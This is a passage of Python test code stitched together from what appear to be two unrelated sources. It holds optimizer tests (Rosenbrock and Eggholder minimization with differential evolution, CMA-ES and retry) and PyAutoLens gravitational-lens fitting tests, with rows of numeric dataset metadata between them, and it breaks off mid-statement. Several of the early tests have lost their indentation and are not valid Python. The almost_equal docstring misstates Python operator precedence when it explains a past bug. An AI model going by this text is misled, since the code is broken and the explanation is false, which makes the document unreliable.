assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_gclde_parallel():
popsize = 8
dim = 2
testfun = Rosen(dim)
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = gcldecpp.minimize(wrapper.eval, dim, testfun.bounds,
max_evaluations = max_eval,
popsize=popsize, workers = mp.cpu_count())
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_de():
popsize = 8
dim = 2
testfun = Rosen(dim)
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = de.minimize(wrapper.eval, dim, testfun.bounds,
max_evaluations = max_eval,
popsize=popsize, workers = None)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + 2*popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_rosen_de_delayed():
popsize = 8
dim = 2
testfun = Rosen(dim)
max_eval = 10000
limit = 0.01
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = de.minimize(wrapper.eval, dim, testfun.bounds,
max_evaluations = max_eval,
popsize=popsize, workers = popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(max_eval // popsize + 2 > ret.nit) # too much iterations
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
# assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
# assert(almost_equal(ret.fun, wrapper.get_best_y())) # wrong best y returned
def test_rosen_ask_tell_de():
popsize = 8
dim = 2
testfun = Rosen(dim)
max_eval = 10000
limit = 0.00001
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
es = de.DE(dim, testfun.bounds, popsize = popsize)
iters = max_eval // popsize
for j in range(iters):
xs = es.ask()
ys = [wrapper.eval(x) for x in xs]
stop = es.tell(ys, xs)
if stop != 0:
break
ret = OptimizeResult(x=es.best_x, fun=es.best_value,
nfev=wrapper.get_count(),
nit=es.iterations, status=es.stop)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + 2*popsize >= ret.nfev) # too much function calls
assert(max_eval / popsize + 2 > ret.nit) # too much iterations
# assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
# assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_eggholder_python():
popsize = 1000
dim = 2
testfun = Eggholder()
# use a wrapper to monitor function evaluations
sdevs = [1.0]*dim
max_eval = 100000
limit = -800
for _ in range(5):
wrapper = Wrapper(testfun.fun, dim)
ret = cmaes.minimize(wrapper.eval, testfun.bounds, input_sigma = sdevs,
max_evaluations = max_eval, popsize=popsize)
if limit > ret.fun:
break
assert(limit > ret.fun) # optimization target not reached
assert(max_eval + popsize >= ret.nfev) # too much function calls
assert(ret.nfev == wrapper.get_count()) # wrong number of function calls returned
assert(almost_equal(ret.x, wrapper.get_best_x())) # wrong best X returned
assert(ret.fun == wrapper.get_best_y()) # wrong best y returned
def test_eggholder_retry():
    """Minimize the Eggholder function using the simple retry mechanism."""
    dim = 2
    testfun = Eggholder()
    limit = -956
    for _ in range(5):
        wrapper = Wrapper(testfun.fun, dim)
        ret = retry.minimize(wrapper.eval, testfun.bounds, num_retries=100)
        if ret.fun < limit:
            break
    assert ret.fun < limit  # optimization target not reached
    assert wrapper.get_count() == ret.nfev  # wrong number of function calls returned
    assert almost_equal(ret.x, wrapper.get_best_x())  # wrong best X returned
    assert wrapper.get_best_y() == ret.fun  # wrong best y returned
def test_eggholder_advanced_retry():
    """Minimize the Eggholder function using the advanced retry mechanism."""
    dim = 2
    testfun = Eggholder()
    limit = -956
    for _ in range(5):
        wrapper = Wrapper(testfun.fun, dim)
        ret = advretry.minimize(wrapper.eval, testfun.bounds, num_retries=300)
        if ret.fun < limit:
            break
    assert ret.fun < limit  # optimization target not reached
    assert wrapper.get_count() == ret.nfev  # wrong number of function calls returned
    assert almost_equal(ret.x, wrapper.get_best_x())  # wrong best X returned
    assert almost_equal(ret.fun, wrapper.get_best_y())  # wrong best y returned
def almost_equal(X1, X2):
    """Compare two scalars or sequences for approximate equality.

    Elements near zero are compared by absolute difference, all others by
    relative difference, both with a tolerance of 1e-5.  Returns False when
    the sequence lengths differ.

    Bug fix: the original wrote ``abs(a / b - 1 > eps)``, which evaluates
    ``1 > eps`` (True) first, yielding ``abs(a / b - 1)`` used as a
    truthiness test — so any pair with ratio != 1 was rejected, defeating
    the tolerance.  The parenthesis now encloses only the difference.
    """
    if np.isscalar(X1):
        X1 = [X1]
        X2 = [X2]
    if len(X1) != len(X2):
        return False
    eps = 1E-5
    for i in range(len(X1)):
        a = X1[i]
        b = X2[i]
        if abs(a) < eps or abs(b) < eps:
            # near zero a relative test is meaningless; compare absolutely
            if abs(a - b) > eps:
                return False
        else:
            # relative comparison; b is guaranteed non-zero in this branch
            if abs(a / b - 1) > eps:
                return False
    return True
| 38.084795
| 87
| 0.611977
| 1,731
| 13,025
| 4.482958
| 0.084922
| 0.041495
| 0.057732
| 0.051546
| 0.898325
| 0.898325
| 0.898325
| 0.877448
| 0.870103
| 0.870103
| 0
| 0.025531
| 0.287294
| 13,025
| 341
| 88
| 38.196481
| 0.810406
| 0.214664
| 0
| 0.809028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.236111
| 1
| 0.052083
| false
| 0
| 0.020833
| 0
| 0.086806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2db8cf621b087a78c6127048a336d6812320f848
| 67,176
|
py
|
Python
|
test/lens/test_lens_fit.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
test/lens/test_lens_fit.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
test/lens/test_lens_fit.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
from autofit.tools import fit_util
from autolens.data import ccd
from autolens.data.array import scaled_array
from autolens.data.array import mask as msk
from autolens.model.galaxy import galaxy as g
from autolens.lens.util import lens_fit_util as util
from autolens.lens import ray_tracing, lens_fit
from autolens.lens import lens_data as ld
from autolens.model.profiles import light_profiles as lp
from autolens.model.profiles import mass_profiles as mp
from autolens.model.inversion import pixelizations
from autolens.model.inversion import regularization
from autolens.model.inversion import inversions
from test.mock.mock_profiles import MockLightProfile
from test.mock.mock_lens import MockTracer
from test.mock.mock_galaxy import MockHyperGalaxy
@pytest.fixture(name='lens_data_blur')
def make_lens_data_blur():
    """4x4 image with a central 2x2 block of 1s, a uniform (non-renormalized)
    3x3 PSF of 1s, and a mask exposing only the central 2x2 pixels."""
    image = np.zeros((4, 4))
    image[1:3, 1:3] = 1.0
    psf = ccd.PSF(array=np.ones((3, 3)), pixel_scale=1.0, renormalize=False)
    ccd_data = ccd.CCDData(image, pixel_scale=1.0, psf=psf, noise_map=np.ones((4, 4)))
    mask = np.full((4, 4), True)
    mask[1:3, 1:3] = False
    mask = msk.Mask(array=mask, pixel_scale=1.0)
    return ld.LensData(ccd_data, mask, sub_grid_size=1)
@pytest.fixture(name='lens_data_manual')
def make_li_manual():
    """5x5 image whose central 3x3 region holds the values 1..9, with an
    asymmetric 3x3 PSF and a mask exposing only that central region."""
    image = np.zeros((5, 5))
    image[1:4, 1:4] = np.arange(1.0, 10.0).reshape(3, 3)
    psf = ccd.PSF(array=np.array([[1.0, 5.0, 9.0],
                                  [2.0, 5.0, 1.0],
                                  [3.0, 4.0, 0.0]]), pixel_scale=1.0)
    ccd_data = ccd.CCDData(image, pixel_scale=1.0, psf=psf, noise_map=np.ones((5, 5)))
    mask = np.full((5, 5), True)
    mask[1:4, 1:4] = False
    mask = msk.Mask(array=mask, pixel_scale=1.0)
    return ld.LensData(ccd_data, mask, sub_grid_size=1)
@pytest.fixture(name='hyper')
def make_hyper():
    """Bundle of hyper-galaxy test inputs: a 4x4 hyper model image, two 4x4
    hyper galaxy images and their minimum contribution values.

    The pixel values are arbitrary; they only need to be fixed and non-trivial
    so the hyper-noise scaling tests below produce deterministic results.
    """
    # bare attribute container (a simple namespace)
    class Hyper(object):
        def __init__(self):
            pass
    hyper = Hyper()
    hyper.hyper_model_image = np.array([[1.0, 3.0, 5.0, 7.0],
                                        [7.0, 9.0, 8.0, 1.0],
                                        [6.0, 4.0, 0.0, 9.0],
                                        [3.0, 4.0, 5.0, 6.0]])
    hyper.hyper_galaxy_images = [np.array([[1.0, 3.0, 5.0, 4.0],
                                           [7.0, 9.0, 8.0, 9.0],
                                           [6.0, 4.0, 0.0, 3.0],
                                           [6.0, 2.0, 3.0, 2.0]]),
                                 np.array([[1.0, 3.0, 5.0, 1.0],
                                           [7.0, 9.0, 8.0, 2.0],
                                           [6.0, 4.0, 0.0, 3.0],
                                           [1.0, 3.0, 4.0, 1.0]])]
    # one minimum value per hyper galaxy image
    hyper.hyper_minimum_values = [0.2, 0.8]
    return hyper
@pytest.fixture(name='lens_data_hyper_no_blur')
def make_li_hyper_no_blur(hyper):
    """Hyper lens data with a delta-function PSF (no blurring): a 4x4 image
    of central 1s masked down to the inner 2x2, plus the 'hyper' inputs."""
    image = np.zeros((4, 4))
    image[1:3, 1:3] = 1.0
    # delta-function kernel: a single 1 at the centre, so convolution is a no-op
    psf_array = np.zeros((3, 3))
    psf_array[1, 1] = 1.0
    psf = ccd.PSF(array=psf_array, pixel_scale=1.0, renormalize=False)
    ccd_data = ccd.CCDData(image, pixel_scale=1.0, psf=psf, noise_map=np.ones((4, 4)))
    mask = np.full((4, 4), True)
    mask[1:3, 1:3] = False
    mask = msk.Mask(array=mask, pixel_scale=1.0)
    return ld.LensDataHyper(ccd_data, mask, hyper_model_image=hyper.hyper_model_image,
                            hyper_galaxy_images=hyper.hyper_galaxy_images,
                            hyper_minimum_values=hyper.hyper_minimum_values, sub_grid_size=1)
@pytest.fixture(name='lens_data_hyper_manual')
def make_li_hyper_manual(hyper):
    """Hyper variant of lens_data_manual: 5x5 image with values 1..9 in the
    centre, an asymmetric 3x3 PSF, and the inputs from the 'hyper' fixture."""
    image = np.zeros((5, 5))
    image[1:4, 1:4] = np.arange(1.0, 10.0).reshape(3, 3)
    psf = ccd.PSF(array=np.array([[1.0, 5.0, 9.0],
                                  [2.0, 5.0, 1.0],
                                  [3.0, 4.0, 0.0]]), pixel_scale=1.0)
    ccd_data = ccd.CCDData(image, pixel_scale=1.0, psf=psf, noise_map=np.ones((5, 5)))
    mask = np.full((5, 5), True)
    mask[1:4, 1:4] = False
    mask = msk.Mask(array=mask, pixel_scale=1.0)
    return ld.LensDataHyper(ccd_data, mask, hyper_model_image=hyper.hyper_model_image,
                            hyper_galaxy_images=hyper.hyper_galaxy_images,
                            hyper_minimum_values=hyper.hyper_minimum_values, sub_grid_size=1)
class TestAbstractLensFit:
    """Tests for lens_fit.AbstractLensFit: counting inversions and computing
    unmasked model images from a padded tracer."""

    class TestAbstractLogic:

        def test__logic_in_abstract_fit(self, lens_data_manual):
            """total_inversions counts galaxies that carry a pixelization."""
            galaxy_light = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[galaxy_light],
                                                  image_plane_grid_stack=lens_data_manual.grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_manual.psf,
                                           map_to_scaled_array=lens_data_manual.map_to_scaled_array)
            # light-profile only -> no inversions
            assert fit.total_inversions == 0
            # a galaxy with pixelization + regularization contributes one inversion
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g.Galaxy(pixelization=pixelizations.Rectangular(),
                                                                          regularization=regularization.Constant())],
                                                  image_plane_grid_stack=lens_data_manual.grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_manual.psf,
                                           map_to_scaled_array=lens_data_manual.map_to_scaled_array)
            assert fit.total_inversions == 1

    class TestUnmaskedModelImage:

        def test__padded_tracer_is_none__unmasked_model_images_return_none(self, lens_data_blur):
            """Without a padded tracer there is no unmasked model image."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert fit.unmasked_model_image == None

        def test__padded_tracer_input__all_planes_have_light_profiles__unmasked_model_image_returns_array(self,
                                                                                                          lens_data_blur):
            """With a padded tracer of light-profile planes an array is returned."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0],
                                                         image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image) == scaled_array.ScaledSquarePixelArray
            # same result for a two-plane (image + source) padded tracer
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g0, g0],
                                                                image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image) == scaled_array.ScaledSquarePixelArray

        def test__galaxy_in_tracer_has_pixelization__unmasked_model_image_is_none(self, lens_data_blur):
            """A pixelization anywhere in the padded tracer suppresses the image."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0),
                          pixelization=pixelizations.Rectangular(), regularization=regularization.Constant())
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0],
                                                         image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert fit.unmasked_model_image == None
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g0, g0],
                                                                image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert fit.unmasked_model_image == None

    class TestUnmaskedModelImageOfPlanes:

        def test__padded_tracer_is_none__unmasked_model_images_return_none(self, lens_data_blur):
            """Without a padded tracer the per-plane images are None."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert fit.unmasked_model_image_of_planes == None

        def test__padded_tracer_input__all_planes_have_light_profiles__unmasked_model_image_returns_array(self,
                                                                                                          lens_data_blur):
            """Every plane with light profiles yields a per-plane array."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0],
                                                         image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image_of_planes[0]) == scaled_array.ScaledSquarePixelArray
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g0, g0],
                                                                image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image_of_planes[0]) == scaled_array.ScaledSquarePixelArray
            assert type(fit.unmasked_model_image_of_planes[1]) == scaled_array.ScaledSquarePixelArray

        def test__galaxy_in_tracer_has_pixelization__unmasked_model_image_of_that_plane_is_none(self, lens_data_blur):
            """Only the plane containing a pixelized galaxy becomes None."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0),
                          pixelization=pixelizations.Rectangular(), regularization=regularization.Constant())
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0],
                                                         image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert fit.unmasked_model_image_of_planes[0] == None
            # pixelized image plane, plain source plane
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g.Galaxy()],
                                                                image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert fit.unmasked_model_image_of_planes[0] == None
            assert type(fit.unmasked_model_image_of_planes[1]) == scaled_array.ScaledSquarePixelArray
            # plain image plane, pixelized source plane
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g.Galaxy()], source_galaxies=[g0],
                                                                image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image_of_planes[0]) == scaled_array.ScaledSquarePixelArray
            assert fit.unmasked_model_image_of_planes[1] == None

    class TestUnmaskedModelImageOfPlanesAndGalaxies:

        def test__padded_tracer_is_none__unmasked_model_images_return_none(self, lens_data_blur):
            """Without a padded tracer the per-galaxy images are None."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert fit.unmasked_model_image_of_planes_and_galaxies == None

        def test__padded_tracer_input__all_planes_have_light_profiles__unmasked_model_images_returns_array(self,
                                                                                                           lens_data_blur):
            """Nested [plane][galaxy] arrays are returned for light profiles."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0, g0],
                                                         image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][0]) == scaled_array.ScaledSquarePixelArray
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][1]) == scaled_array.ScaledSquarePixelArray
            # 2 lens galaxies + 3 source galaxies -> 2x then 3x arrays
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g0, g0, g0],
                                                                image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][0]) == scaled_array.ScaledSquarePixelArray
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][1]) == scaled_array.ScaledSquarePixelArray
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][0]) == scaled_array.ScaledSquarePixelArray
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][1]) == scaled_array.ScaledSquarePixelArray
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][2]) == scaled_array.ScaledSquarePixelArray

        def test__galaxy_in_tracer_has_pixelization__unmasked_model_image_of_that_galaxy_is_none(self, lens_data_blur):
            """Only the pixelized galaxy's entry becomes None; others stay arrays."""
            g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
            g_pix = g.Galaxy(pixelization=pixelizations.Rectangular(), regularization=regularization.Constant())
            tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
            padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g_pix],
                                                         image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert fit.unmasked_model_image_of_planes_and_galaxies[0][0] == None
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g_pix], source_galaxies=[g0],
                                                                image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][0]) == scaled_array.ScaledSquarePixelArray
            assert fit.unmasked_model_image_of_planes_and_galaxies[0][1] == None
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][0]) == scaled_array.ScaledSquarePixelArray
            padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g.Galaxy(), g_pix],
                                                                source_galaxies=[g0, g_pix],
                                                                image_plane_grid_stack=lens_data_blur.padded_grid_stack)
            fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
                                           map_to_scaled_array=lens_data_blur.map_to_scaled_array)
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][0]) == scaled_array.ScaledSquarePixelArray
            assert fit.unmasked_model_image_of_planes_and_galaxies[0][1] == None
            assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][0]) == scaled_array.ScaledSquarePixelArray
            assert fit.unmasked_model_image_of_planes_and_galaxies[1][1] == None
class TestAbstractLensProfileFit:
    """Tests for lens_fit.AbstractLensProfileFit's PSF-blurred profile image."""

    class TestBlurredImage:

        def test__mock_tracer__2x2_image_all_1s__3x3_psf_all_1s__blurring_region__image_blurs_to_9s(self, lens_data_blur):
            """A uniform 3x3 PSF of 1s sums the 3x3 neighbourhood of each
            unmasked pixel (all 1s), so every central pixel blurs to 9."""
            tracer = MockTracer(unblurred_image_1d=lens_data_blur.mask.map_2d_array_to_masked_1d_array(lens_data_blur.image),
                                blurring_image_1d=np.array([1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
                                has_light_profile=True, has_hyper_galaxy=False, has_pixelization=False)
            fit = lens_fit.AbstractLensProfileFit(lens_data=lens_data_blur, tracer=tracer, padded_tracer=None)
            assert (fit.blurred_profile_image == np.array([[0.0, 0.0, 0.0, 0.0],
                                                           [0.0, 9.0, 9.0, 0.0],
                                                           [0.0, 9.0, 9.0, 0.0],
                                                           [0.0, 0.0, 0.0, 0.0]])).all()
class TestAbstractLensInversionFit:
    """Tests for lens_fit.AbstractLensInversionFit's per-plane model images."""

    class TestModelImageOfPlanes:

        def test__model_images_are_none_and_an_image(self):
            """The light-free image plane yields None; the pixelized source
            plane reconstructs the (uniform) masked image."""
            image = np.array([[0.0, 0.0, 0.0, 0.0, 0.0],
                              [0.0, 1.0, 1.0, 1.0, 0.0],
                              [0.0, 1.0, 1.0, 1.0, 0.0],
                              [0.0, 1.0, 1.0, 1.0, 0.0],
                              [0.0, 0.0, 0.0, 0.0, 0.0]])
            mask = np.array([[True, True, True, True, True],
                             [True, False, False, False, True],
                             [True, False, False, False, True],
                             [True, False, False, False, True],
                             [True, True, True, True, True]])
            mask = msk.Mask(mask, pixel_scale=1.0)
            # delta-function PSF -> no blurring
            psf = ccd.PSF(array=np.array([[0.0, 0.0, 0.0],
                                          [0.0, 1.0, 0.0],
                                          [0.0, 0.0, 0.0]]), pixel_scale=1.0)
            ccd_data = ccd.CCDData(image=image, pixel_scale=1.0, psf=psf, noise_map=np.ones((5, 5)))
            lens_data = ld.LensData(ccd_data=ccd_data, mask=mask, sub_grid_size=2)
            galaxy_pix = g.Galaxy(pixelization=pixelizations.Rectangular(shape=(3, 3)),
                                  regularization=regularization.Constant(coefficients=(1.0,)))
            tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g.Galaxy()], source_galaxies=[galaxy_pix],
                                                         image_plane_grid_stack=lens_data.grid_stack, border=None)
            fit = lens_fit.AbstractLensInversionFit(lens_data=lens_data, noise_map_1d=lens_data.noise_map_1d,
                                                    tracer=tracer)
            assert fit.model_image_of_planes[0] == None
            # loose tolerance: regularization slightly smooths the reconstruction
            assert fit.model_image_of_planes[1] == pytest.approx(np.array([[0.0, 0.0, 0.0, 0.0, 0.0],
                                                                           [0.0, 1.0, 1.0, 1.0, 0.0],
                                                                           [0.0, 1.0, 1.0, 1.0, 0.0],
                                                                           [0.0, 1.0, 1.0, 1.0, 0.0],
                                                                           [0.0, 0.0, 0.0, 0.0, 0.0]]), 1e-2)
class TestAbstractLensProfileInversionFit:
    """Tests for lens_fit.AbstractLensProfileInversionFit's per-plane images."""

    class TestModelImagesOfPlanes:

        def test___model_images_of_planes_are_profile_and_inversion_images(self, lens_data_manual):
            """Plane 0 is the blurred light-profile image; plane 1 is the
            inversion reconstruction of the profile-subtracted image."""
            galaxy_light = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0))
            pix = pixelizations.Rectangular(shape=(3, 3))
            reg = regularization.Constant(coefficients=(1.0,))
            galaxy_pix = g.Galaxy(pixelization=pix, regularization=reg)
            tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[galaxy_light], source_galaxies=[galaxy_pix],
                                                         image_plane_grid_stack=lens_data_manual.grid_stack, border=None)
            fit = lens_fit.AbstractLensProfileInversionFit(lens_data=lens_data_manual,
                                                           noise_map_1d=lens_data_manual.noise_map_1d,
                                                           tracer=tracer, padded_tracer=None)
            # recompute the blurred profile image manually and compare
            blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
                unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
                convolver=lens_data_manual.convolver_image)
            blurred_profile_image = lens_data_manual.map_to_scaled_array(array_1d=blurred_profile_image_1d)
            assert (fit.model_image_of_planes[0] == blurred_profile_image).all()
            # recompute the inversion of the profile-subtracted image manually
            blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
                unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
                convolver=lens_data_manual.convolver_image)
            profile_subtracted_image_1d = lens_data_manual.image_1d - blurred_profile_image_1d
            mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_manual.grid_stack, border=None)
            inversion = inversions.inversion_from_image_mapper_and_regularization(
                image_1d=profile_subtracted_image_1d, noise_map_1d=lens_data_manual.noise_map_1d,
                convolver=lens_data_manual.convolver_mapping_matrix, mapper=mapper, regularization=reg)
            assert (fit.model_image_of_planes[1] == inversion.reconstructed_data).all()
class TestLensProfileFit:
    """End-to-end tests for lens_fit.LensProfileFit: likelihood values on
    hand-computable data and a full comparison with a manual computation."""

    class TestLikelihood:

        def test__image__tracing_fits_data_perfectly__no_psf_blurring__lh_is_noise_normalization(self):
            """A perfect model with unit noise leaves only the noise term."""
            # delta-function PSF -> no blurring
            psf = ccd.PSF(array=(np.array([[0.0, 0.0, 0.0],
                                           [0.0, 1.0, 0.0],
